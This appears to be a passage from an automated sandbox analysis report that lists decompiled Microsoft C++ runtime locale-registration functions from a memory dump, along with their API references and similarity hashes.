Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEB8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB938

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 744a37306354a07de2afec166f0ef72ec882dfeb201e3499b399a1d58dc37e86
Instruction ID: d1d9904130f745f9a6d38253d43ed02f12eb5ca1398261963f13a339af96ea1f
Opcode Fuzzy Hash: 744a37306354a07de2afec166f0ef72ec882dfeb201e3499b399a1d58dc37e86
Instruction Fuzzy Hash: 2611A075808219DBCF01FB64C840ABDB775AF44358F270509F611AB290DF74AE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFBE3, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DDDFBE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t110 - 0x14, 0);
				_t105 =  *0x6de96e00; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6DDB161C(0x6de96dac);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6DDD66BA(_t110 - 0x14);
					return E6DDF0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6DDE15C4(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t110 - 0x20);
							E6DDF3D74(_t110 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t102, _t105, 0x14);
							E6DDD6653(_t110 - 0x14, 0);
							_t106 =  *0x6de96dd0; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6DDB161C(0x6de96d60);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6DDD66BA(_t110 - 0x14);
								return E6DDF0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6DDE162A(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6DDB1438(_t93);
										E6DDF3D74(_t110 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de3851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6de3c0c4;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6DDE542F(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6DDF0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6DDD6FD3(__eflags, _t103);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6de96dd0 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6DDD6FD3(__eflags, _t102);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6de96e00 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

0x6dddfbe3
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc14
0x6dddfc19
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21

APIs

__EH_prolog3.LIBCMT ref: 6DDDFBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFBF4
int.LIBCPMT ref: 6DDDFC0B

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFC83

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: d016824108599fe071fb63f70c64a682eaad30fd9a7984576d5b2ab317761697
Instruction ID: a9d47e72587acc106a881c1edc03ff837dfe81169af9d293e6b95feb553fb368
Opcode Fuzzy Hash: d016824108599fe071fb63f70c64a682eaad30fd9a7984576d5b2ab317761697
Instruction Fuzzy Hash: D411A075908119DBCF01FB64C880BFDB7B5AF44318F264009F911AB290DFB49A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFB3D, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6DDDFB3D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t154 - 0x14, 0);
				_t147 =  *0x6de96dcc; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6DDB161C(0x6de96d80);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6DDD66BA(_t154 - 0x14);
					return E6DDF0075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6DDE1558(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t154 - 0x20);
							E6DDF3D74(_t154 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t143, _t147, 0x14);
							E6DDD6653(_t154 - 0x14, 0);
							_t148 =  *0x6de96e00; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6DDB161C(0x6de96dac);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6DDD66BA(_t154 - 0x14);
								return E6DDF0075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6DDE15C4(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t154 - 0x20);
										E6DDF3D74(_t154 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t110, _t144, _t148, 0x14);
										E6DDD6653(_t154 - 0x14, 0);
										_t149 =  *0x6de96dd0; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6DDB161C(0x6de96d60);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6DDB171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6DDD66BA(_t154 - 0x14);
											return E6DDF0075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6DDE162A(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6DDB1438(_t131);
													E6DDF3D74(_t154 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de3851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6de3c0c4;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6DDE542F(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6DDF0075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6DDD6FD3(__eflags, _t145);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6de96dd0 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6DDD6FD3(__eflags, _t144);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6de96e00 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6DDD6FD3(__eflags, _t143);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6de96dcc = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6dddfb3d
0x6dddfb3d
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb6e
0x6dddfb73
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b

APIs

__EH_prolog3.LIBCMT ref: 6DDDFB44
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFB4E
int.LIBCPMT ref: 6DDDFB65

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFBDD

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a1f162fd8f1d4cffaf4102ed168cab625336ea29b26b815566559aa570ef9fbc
Instruction ID: 92ac90ec6d29870d8730f7e506127764c0181f985cc4cd0c1530a2e1bd5af46c
Opcode Fuzzy Hash: a1f162fd8f1d4cffaf4102ed168cab625336ea29b26b815566559aa570ef9fbc
Instruction Fuzzy Hash: 2811CEB2808119DBCF05FB64C850ABEB774AF84318F27040AF611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFA97, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDFA97(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t198 - 0x14, 0);
				_t189 =  *0x6de96dfc; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6DDB161C(0x6de96da8);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6DDD66BA(_t198 - 0x14);
					return E6DDF0075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6DDE14EC(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t198 - 0x20);
							E6DDF3D74(_t198 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t184, _t189, 0x14);
							E6DDD6653(_t198 - 0x14, 0);
							_t190 =  *0x6de96dcc; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6DDB161C(0x6de96d80);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6DDD66BA(_t198 - 0x14);
								return E6DDF0075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6DDE1558(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t198 - 0x20);
										E6DDF3D74(_t198 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t141, _t185, _t190, 0x14);
										E6DDD6653(_t198 - 0x14, 0);
										_t191 =  *0x6de96e00; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6DDB161C(0x6de96dac);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6DDD66BA(_t198 - 0x14);
											return E6DDF0075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6DDE15C4(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t198 - 0x20);
													E6DDF3D74(_t198 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t141, _t186, _t191, 0x14);
													E6DDD6653(_t198 - 0x14, 0);
													_t192 =  *0x6de96dd0; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6DDB161C(0x6de96d60);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6DDB171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6DDD66BA(_t198 - 0x14);
														return E6DDF0075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6DDE162A(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6DDB1438(_t169);
																E6DDF3D74(_t198 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de3851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6de3c0c4;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6DDE542F(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6DDF0075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6DDD6FD3(__eflags, _t187);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6de96dd0 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6DDD6FD3(__eflags, _t186);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6de96e00 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6DDD6FD3(__eflags, _t185);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6de96dcc = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6DDD6FD3(__eflags, _t184);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6de96dfc = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6dddfa97
0x6dddfa97
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfac8
0x6dddfacd
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5

APIs

__EH_prolog3.LIBCMT ref: 6DDDFA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFAA8
int.LIBCPMT ref: 6DDDFABF

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFB37

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1411ded1d23143db06c1dfed90311f103e4727e74dda81b7bf443bbc6fe1743c
Instruction ID: e84f50caa7cc29c33f6f960e22e3ac69ec8b3bedaca0da897098b19e45adb461
Opcode Fuzzy Hash: 1411ded1d23143db06c1dfed90311f103e4727e74dda81b7bf443bbc6fe1743c
Instruction Fuzzy Hash: 4911A076908119DBCF01FBA4C850ABEB775AF44318F27401AF621AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF41B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t638 - 0x14, 0);
				_t609 =  *0x6de96df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6DDB161C(0x6de96d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6DDB171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
